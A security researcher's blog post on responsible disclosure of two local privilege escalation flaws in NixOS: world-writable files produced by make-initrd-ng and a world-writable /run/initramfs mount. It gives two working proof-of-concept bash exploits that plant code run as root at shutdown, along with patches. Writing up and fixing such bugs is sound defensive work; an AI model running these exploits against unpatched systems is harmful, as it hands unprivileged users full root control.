Stumbling upon a pair of LPEs in NixOS

9 minute read Published: 2025-04-13

Preface

I recently discovered a pair of local privilege escalation vulnerabilities in NixOS.
This blog post explains how I found them.

See the following links for more information about the vulnerabilities themselves:

Background

I discovered the first vulnerability by accident, while I was trying to create my first "real" NixOS configuration for my home server.

Taking inspiration from tmpfs as root, I set out to harden my configuration as best I could. That meant no needless persistent state, nothing writable that doesn't need to be, etc.

As I was still learning NixOS (and the Nix ecosystem), I made a lot of mistakes and ran into a lot of errors.
Some of these errors prevented the system from booting properly (incorrect mounts), while others prevented me from logging in (broken /etc/{passwd,shadow}).

So I booted up my work-in-progress NixOS configuration in QEMU for the nth time, half-expecting it not to work properly due to my previous tinkering.
Instead, I was able to log in successfully, and systemctl reported zero failing units.

A Foreboding Warning

Just in case, I checked journalctl -b0 and skimmed through the early boot logs, where a certain warning showed up:

'/nix/store/b2cfj7yk3wfg1jdwjzim7306hvsc5gnl-systemd-257.3/lib/systemd/system-generators/systemd-debug-generator' is marked world-writable, which is a security risk as it is executed with privileges. Please remove world writability permission bits. Proceeding anyway.
'/nix/store/b2cfj7yk3wfg1jdwjzim7306hvsc5gnl-systemd-257.3/lib/systemd/system-generators/systemd-fstab-generator' is marked world-writable, which is a security risk as it is executed with privileges. Please remove world writability permission bits. Proceeding anyway.
'/nix/store/b2cfj7yk3wfg1jdwjzim7306hvsc5gnl-systemd-257.3/lib/systemd/system-generators/systemd-gpt-auto-generator' is marked world-writable, which is a security risk as it is executed with privileges. Please remove world writability permission bits. Proceeding anyway.
'/nix/store/b2cfj7yk3wfg1jdwjzim7306hvsc5gnl-systemd-257.3/lib/systemd/system-generators/systemd-hibernate-resume-generator' is marked world-writable, which is a security risk as it is executed with privileges. Please remove world writability permission bits. Proceeding anyway.
'/nix/store/b2cfj7yk3wfg1jdwjzim7306hvsc5gnl-systemd-257.3/lib/systemd/system-generators/systemd-run-generator' is marked world-writable, which is a security risk as it is executed with privileges. Please remove world writability permission bits. Proceeding anyway.
'/nix/store/b2cfj7yk3wfg1jdwjzim7306hvsc5gnl-systemd-257.3/lib/systemd/system-generators/systemd-tpm2-generator' is marked world-writable, which is a security risk as it is executed with privileges. Please remove world writability permission bits. Proceeding anyway.

These messages are from systemd, complaining that some executables it calls are world-writable.

I thought that was strange - I hadn't made any changes to the initrd, besides enabling systemd: boot.initrd.systemd.enable = true.

So I decided to investigate. First, I looked at the initrd itself.

NixOS conveniently makes this possible without even applying the configuration (so long as you remember the long attribute path):

$ nix build .#nixosConfigurations.default.config.system.build.initialRamdisk.out

Now we can inspect result/initrd:

$ zstd -d < result/initrd | cpio -t --verbose | rg '^\-rwxrwxrwx' --count
176

Sure enough, the initrd has 176 files that are world-writable, and looking through the file list (remove --count), it seemed to include a lot of important executables.
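Note that the rg pattern above only matches regular files whose mode is exactly rwxrwxrwx. As a minimal sketch of a slightly broader check, the following Rust function counts every regular file with the "other" write bit set, given the text printed by cpio -t --verbose. The function name is made up for this example, and it assumes the usual ls -l-style listing where each line starts with a 10-character mode string.

```rust
/// Count regular files whose "other" write bit is set in an `ls -l`-style
/// listing, such as the output of `cpio -t --verbose`.
fn count_world_writable(listing: &str) -> usize {
    listing
        .lines()
        .filter(|line| {
            let mode = line.as_bytes();
            // Byte 0 is the file type ('-' means regular file) and byte 8 is
            // the write bit for "other" in a string like "-rwxrwxrwx".
            mode.len() >= 10 && mode[0] == b'-' && mode[8] == b'w'
        })
        .count()
}
```

Symlinks always show up as lrwxrwxrwx in such listings, so they are skipped on purpose; only regular files are counted.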

Finding the Culprit

At this point, it's clear that the initrd has some very broken file permissions.
I just needed to figure out why.

After some ripgrep-ing around in nixpkgs, I found a suspect:

$ rg perm pkgs/build-support/kernel/
pkgs/build-support/kernel/make-initrd-ng/src/main.rs
191:        let mut permissions = fs::metadata(&target)
193:            .permissions();
194:        permissions.set_readonly(false);
195:        fs::set_permissions(&target, permissions)

Let's take a closer look at that file:

if let Ok(Object::Elf(e)) = Object::parse(&contents) {
    add_dependencies(source, e, &contents, &dlopen, queue)?;

    // Make file writable to strip it
    let mut permissions = fs::metadata(&target)
        .wrap_err_with(|| format!("failed to get metadata for {:?}", target))?
        .permissions();
    permissions.set_readonly(false);
    fs::set_permissions(&target, permissions)
        .wrap_err_with(|| format!("failed to set readonly flag to false for {:?}", target))?;

    // Strip further than normal
    if let Ok(strip) = env::var("STRIP") {
        if !Command::new(strip)
            .arg("--strip-all")
            .arg(OsStr::new(&target))
            .output()?
            .status
            .success()
        {
            println!("{:?} was not successfully stripped.", OsStr::new(&target));
        }
    }
};

Immediately, we can see an obvious problem: the original permissions are never restored after making the file writable.

But there's a bigger problem:

    permissions.set_readonly(false);

On Unix, this line is equivalent to chmod a+w <file>: it sets the write bit for owner, group, and others, making each ELF file world-writable.

Thus, the bug lies in the NixOS-specific make-initrd-ng tool, which is called to generate the contents of the initrd image.
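The effect of set_readonly(false) can be reproduced outside of make-initrd-ng. The following is a minimal sketch, not code from nixpkgs: the helper name is invented for illustration, and the caller is assumed to pass a path to a scratch file that does not exist yet. It repeats the same three calls as the original code and reports the resulting mode bits.

```rust
use std::fs::{self, File, Permissions};
use std::io;
use std::os::unix::fs::PermissionsExt;
use std::path::Path;

/// Create `path`, set it to `initial_mode`, apply `set_readonly(false)` the
/// same way the original make-initrd-ng code did, and return the resulting
/// permission bits.
fn mode_after_clearing_readonly(path: &Path, initial_mode: u32) -> io::Result<u32> {
    File::create(path)?;
    fs::set_permissions(path, Permissions::from_mode(initial_mode))?;

    // The same sequence as in copy_file: read, clear "readonly", write back.
    let mut permissions = fs::metadata(path)?.permissions();
    permissions.set_readonly(false);
    fs::set_permissions(path, permissions)?;

    // Mask off the file type bits so only rwxrwxrwx remains.
    Ok(fs::metadata(path)?.permissions().mode() & 0o777)
}
```

Starting from a typical store file mode of 0o555, this returns 0o777: all three write bits are set, not just the owner's.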

Patch Time

At this point, it was clear to me that I had found a bug in NixOS, so I drafted a patch to fix the issue:

diff --git a/pkgs/build-support/kernel/make-initrd-ng/src/main.rs b/pkgs/build-support/kernel/make-initrd-ng/src/main.rs
index 934c2faebed8..0187931e3019 100644
--- a/pkgs/build-support/kernel/make-initrd-ng/src/main.rs
+++ b/pkgs/build-support/kernel/make-initrd-ng/src/main.rs
@@ -188,12 +188,11 @@ fn copy_file<
         add_dependencies(source, e, &contents, &dlopen, queue)?;
 
         // Make file writable to strip it
-        let mut permissions = fs::metadata(&target)
+        let original_permissions = fs::metadata(&target)
             .wrap_err_with(|| format!("failed to get metadata for {:?}", target))?
             .permissions();
-        permissions.set_readonly(false);
-        fs::set_permissions(&target, permissions)
-            .wrap_err_with(|| format!("failed to set readonly flag to false for {:?}", target))?;
+        fs::set_permissions(&target, unix::fs::PermissionsExt::from_mode(0o600))
+            .wrap_err_with(|| format!("failed to set read-write permissions for {:?}", target))?;
 
         // Strip further than normal
         if let Ok(strip) = env::var("STRIP") {
@@ -207,6 +206,10 @@ fn copy_file<
                 println!("{:?} was not successfully stripped.", OsStr::new(&target));
             }
         }
+
+        // Restore original permissions
+        fs::set_permissions(&target, original_permissions)
+            .wrap_err_with(|| format!("failed to restore permissions for {:?}", target))?;
     };
 
     Ok(())

Performing the same test as before, we can check whether the fix worked:

$ nix build .#nixosConfigurations.default.config.system.build.initialRamdisk.out
$ zstd -d < result/initrd | cpio -t --verbose | rg '^\-rwxrwxrwx' --count
0

Much better.
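The save, restrict, restore pattern from the patch can also be tried in isolation. This is a sketch under my own assumptions rather than the code that was merged: the helper name and the closure-based interface are invented for the example, and unlike the patch it restores the permissions even when the modification step fails.

```rust
use std::fs::{self, Permissions};
use std::io;
use std::os::unix::fs::PermissionsExt;
use std::path::Path;

/// Run `modify` while `path` is temporarily owner-read/write only (0o600),
/// then put the original permissions back.
fn with_temporary_owner_write<F>(path: &Path, modify: F) -> io::Result<()>
where
    F: FnOnce(&Path) -> io::Result<()>,
{
    let original = fs::metadata(path)?.permissions();
    fs::set_permissions(path, Permissions::from_mode(0o600))?;

    let result = modify(path);

    // Restore even when `modify` failed, then report the first error.
    let restored = fs::set_permissions(path, original);
    result.and(restored)
}
```

In make-initrd-ng the modification step would be the call to strip; here it is left to the caller.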

I thought about submitting a public PR, under the assumption that world-writable initrd files don't really constitute a security vulnerability for most configurations (most processes run as root during early boot anyway).
Additionally, boot.initrd.systemd.enable is not enabled by default, so only those who explicitly enabled it would be affected (or so I thought).

However, I had recently read systemd's bootup man page, which gave me an idea...

An Exploit?

Systemd supports the usage of an "exitrd" (excerpt from man bootup):

When the system manager is shutting down and /run/initramfs/shutdown exists, it will switch root to /run/initramfs/ and execute /shutdown. This program runs from the tmpfs mounted on /run/, so it can unmount the old root file system and perform additional steps, for example dismantle complex storage or perform additional logging about the shutdown.

If the exitrd is generated with make-initrd-ng as well, we might have an exploitable vulnerability on our hands.

First, let's figure out the name of the make-initrd-ng package (or packages, rather):

$ rg make-initrd-ng pkgs/top-level/
pkgs/top-level/all-packages.nix
671:  makeInitrdNG = callPackage ../build-support/kernel/make-initrd-ng.nix;
672:  makeInitrdNGTool = callPackage ../build-support/kernel/make-initrd-ng-tool.nix { };

Now let's search for them in the nixos directory:

$ rg makeInitrdNG nixos/
nixos/modules/system/boot/systemd/shutdown.nix
74:        ExecStart = "${pkgs.makeInitrdNGTool}/bin/make-initrd-ng ${ramfsContents} /run/initramfs";
[...]

That sure sounds like a match; let's take a look:

{
  # [...]
  systemd.services.generate-shutdown-ramfs = {
    description = "Generate shutdown ramfs";
    wantedBy = [ "shutdown.target" ];
    before = [ "shutdown.target" ];
    unitConfig = {
      DefaultDependencies = false;
      RequiresMountsFor = "/run/initramfs";
      ConditionFileIsExecutable = [
        "!/run/initramfs/shutdown"
      ];
    };
  
    serviceConfig = {
      Type = "oneshot";
      ProtectSystem = "strict";
      ReadWritePaths = "/run/initramfs";
      ExecStart = "${pkgs.makeInitrdNGTool}/bin/make-initrd-ng ${ramfsContents} /run/initramfs";
    };
  };
}

... yeah, let's not submit that PR for now.

This service definition implies that make-initrd-ng is called to populate the exitrd (/run/initramfs) during shutdown.

So if an attacker can run their code after generate-shutdown-ramfs.service, they can simply overwrite /run/initramfs/shutdown and become not just UID 0, but PID 1 as well.
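To get a feel for how much of a populated tree is exposed this way, one could walk it and list every regular file that any user may write to. The function below is only a sketch: its name is invented, and pointing it at /run/initramfs (or at an unpacked initrd) is my assumption about how it would be used.

```rust
use std::fs;
use std::io;
use std::os::unix::fs::PermissionsExt;
use std::path::{Path, PathBuf};

/// Recursively collect regular files under `root` that any user may write to.
fn find_world_writable(root: &Path) -> io::Result<Vec<PathBuf>> {
    let mut found = Vec::new();
    let mut pending = vec![root.to_path_buf()];

    while let Some(dir) = pending.pop() {
        for entry in fs::read_dir(&dir)? {
            let path = entry?.path();
            // symlink_metadata does not follow symlinks, so links such as
            // /run/initramfs/shutdown are skipped instead of being followed.
            let meta = fs::symlink_metadata(&path)?;
            if meta.is_dir() {
                pending.push(path);
            } else if meta.is_file() && (meta.permissions().mode() & 0o002) != 0 {
                found.push(path);
            }
        }
    }

    found.sort();
    Ok(found)
}
```

Any path it returns is a file that an unprivileged process could overwrite in place, which is exactly what the exploit below relies on.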

Naturally, there's one good way to test that theory.

Writing an Exploit

First, we'll need to prevent systemd from terminating our process during shutdown.
Turns out we can just ignore the signals and systemd will graciously give us at least 90 seconds to do whatever we please (YMMV if you're starting from a compromised service rather than a normal user).

We also need to resolve any Nix store paths we use in the exitrd (there's no /run/current-system to rely on).

And so, without further ado, the proof-of-concept exploit script:

#!/usr/bin/env bash

# usage: run this script via `bash poc.sh & disown` as any unprivileged user

# ignore signals to prevent systemd from killing us
trap -- '' SIGQUIT SIGHUP SIGINT SIGTERM SIGUSR1 SIGUSR2 SIGPIPE

# wait for generate-shutdown-ramfs.service to start
while [[ ! -f /run/initramfs/shutdown ]]; do
	sleep 0.1
done

# wait for generate-shutdown-ramfs.service to exit
while systemctl is-active -q generate-shutdown-ramfs.service; do
	sleep 0.1
done

# find bash for our payload
bash_path="$(find /run/initramfs/nix/store -maxdepth 1 -type d -name '*-bash-*' | head -n1)"
bash_path="${bash_path#/run/initramfs}"/bin/bash

# find coreutils for our payload
coreutils_path="$(find /run/initramfs/nix/store -maxdepth 1 -type d -name '*-coreutils-*' | head -n1)"
coreutils_path="${coreutils_path#/run/initramfs}"/bin

# read systemd-shutdown path
target="$(readlink -n /run/initramfs/shutdown)"

# overwrite systemd-shutdown executable with our payload
cat <<EOF > /run/initramfs/"$target"
#!${bash_path}

export PATH="\$PATH:${coreutils_path}"

# uncomment to send output to serial console
#exec >/dev/ttyS0

# show our banner
echo "!!! systemd-shutdown takeover successful: \$(id) !!!"

echo "sleeping for 15 seconds..."
sleep 15

# kernel panic by exiting from PID 1
exit
EOF

Running this script as an unprivileged user via bash poc.sh & disown (logged in physically or via SSH), and performing any form of shutdown (poweroff, reboot, kexec) will result in the banner being printed to the virtual terminal.

The True Scope

Earlier, I mentioned that boot.initrd.systemd.enable has to be enabled for this vulnerability to be exploitable.
Unfortunately, this is not true, because the exitrd is controlled separately by systemd.shutdownRamfs.enable, which is enabled by default!

So this vulnerability actually affects all standard NixOS configurations, dating back to mid-2022 (since nixpkgs commit e5995b22353d003cf2c3b32143ff996b14cbbb62, when the bug was introduced).

Aftermath

Once I successfully proved to myself that this issue really was exploitable, I began writing a report to disclose the issue to the NixOS security team.

Buy One Vulnerability, Get One Free

After submitting the first vulnerability report, I decided I should look into another odd detail I noticed: /run/initramfs had rwxrwxrwt permissions (mode 1777).

These are the default permissions for tmpfs mounts, and /tmp directories on most distros use these permissions.
The "sticky bit" ensures that, once a file or subdirectory is created under the mount point, only its owner (or the owner of the directory, or root) can rename or delete it.

This means that an attacker cannot simply delete and replace /run/initramfs/shutdown with their own file.
However, it does open up a possible attack vector: what if we create the file before make-initrd-ng runs?
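The difference between the two halves of that argument comes down to a few mode bits. As a rough sketch (the type and function names are invented for this example, and group permissions and ACLs are ignored), the following decodes what a directory mode allows for users other than its owner and group:

```rust
/// What a directory's permission bits allow for users other than its owner
/// and group.
#[derive(Debug, PartialEq)]
struct OtherAccess {
    /// Any user may create new entries in the directory.
    can_create: bool,
    /// Any user may delete or rename entries they do not own.
    can_remove_foreign: bool,
}

fn other_access(mode: u32) -> OtherAccess {
    // Creating entries needs both write and search (execute) permission.
    let writable = (mode & 0o003) == 0o003;
    let sticky = (mode & 0o1000) != 0;
    OtherAccess {
        can_create: writable,
        // The sticky bit limits removal to the entry's owner, the
        // directory's owner, and root.
        can_remove_foreign: writable && !sticky,
    }
}
```

For mode 0o1777 this gives can_create = true and can_remove_foreign = false: nobody else can replace an existing file, but anyone can get there first. For a mode of 0o755, both are false.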

Another Exploit

Directly attacking /run/initramfs/shutdown again is possible, but it's rather noisy: generate-shutdown-ramfs.service either fails (because of the existing file), or gets skipped entirely if you make the file executable fast enough (due to its ConditionFileIsExecutable=!/run/initramfs/shutdown).

After some more systemd manual reading, I found an interesting feature:

Shortly before executing the actual system power-off/halt/reboot/kexec, systemd-shutdown will run all executables in /usr/lib/systemd/system-shutdown/ [...]

Helpfully, NixOS patches systemd-shutdown to use /etc/systemd/system-shutdown (otherwise we'd need to use a Nix store path).
So with a bit of luck, we can create the etc directory before make-initrd-ng does, and get root without showing up in the system logs.

#!/usr/bin/env bash

# usage: run this script via `bash poc.sh & disown` as any unprivileged user

# ignore signals to prevent systemd from killing us
trap -- '' SIGQUIT SIGHUP SIGINT SIGTERM SIGUSR1 SIGUSR2 SIGPIPE

# find and read shutdown-ramfs-contents.json
contents_json="$(<$(grep -oE '(/nix/store/[^ ]+shutdown-ramfs-contents\.json)' /etc/systemd/system/generate-shutdown-ramfs.service))"
# extract the store paths we need
bash_path="$(echo "$contents_json" | grep '/nix/store/[^"]*bash' -o)"
coreutils_path="$(echo "$contents_json" | grep '/nix/store/[^"]*coreutils-[^"]*/bin' -o)"

# wait for run-initramfs.mount to create the directory
while [[ ! -d /run/initramfs ]]; do
	:
done

# race time: beat make-initrd-ng to creating /run/initramfs/etc
# (repeated because run-initramfs.mount hasn't finished yet)
while [[ ! -d /run/initramfs/etc ]]; do
	mkdir /run/initramfs/etc 2>/dev/null
done

# we (hopefully) now own /run/initramfs/etc

# insert payload into exitrd
install -Dm755 /dev/stdin /run/initramfs/etc/systemd/system-shutdown/exploit.sh <<EOF
#!${bash_path}

# we are now running as UID 0

export PATH="\$PATH:${coreutils_path}"

# render banner
banner="!!! systemd-shutdown takeover successful: PID=\$\$ \$(id) !!!"

# read /proc/mounts
mount_info="\$(</proc/mounts)"

# show our banner to all TTYs
for dev in /dev/tty*; do
	echo "\$banner (dev=\$dev)" > "\$dev"
	echo "\$mount_info" > "\$dev"
done

# sleep for a bit before continuing
sleep 15
EOF

In my limited testing, this script always beats make-initrd-ng to creating /run/initramfs/etc.

Patch Number Two

The fix is straightforward: just change the permissions for the mountpoint.

diff --git a/nixos/modules/system/boot/systemd/shutdown.nix b/nixos/modules/system/boot/systemd/shutdown.nix
index 1e8b8c6f863c..a839566af35c 100644
--- a/nixos/modules/system/boot/systemd/shutdown.nix
+++ b/nixos/modules/system/boot/systemd/shutdown.nix
@@ -52,6 +52,7 @@ in
         what = "tmpfs";
         where = "/run/initramfs";
         type = "tmpfs";
+        options = "mode=0755";
       }
     ];

After testing the fix, I submitted my second report as a follow-up.

Conclusion

At 2025-04-13 16:00 (UTC), the nixpkgs advisory was made public, along with the PRs containing the security fixes (#398396 and #398397).

Unfortunately, security updates can take a long time to make their way to users:

To be fair, this delay has been exacerbated by a coincidental Perl security fix, which required rebuilding a large part of nixpkgs (a "mass rebuild").

How best to improve the situation seems to be an open question:

As a newcomer to NixOS, I won't pretend to know what the right solution is, but this limitation is worth keeping in mind when using NixOS in security-sensitive contexts.

Timeline

Finally, for transparency's sake, here is my timeline of events (UTC):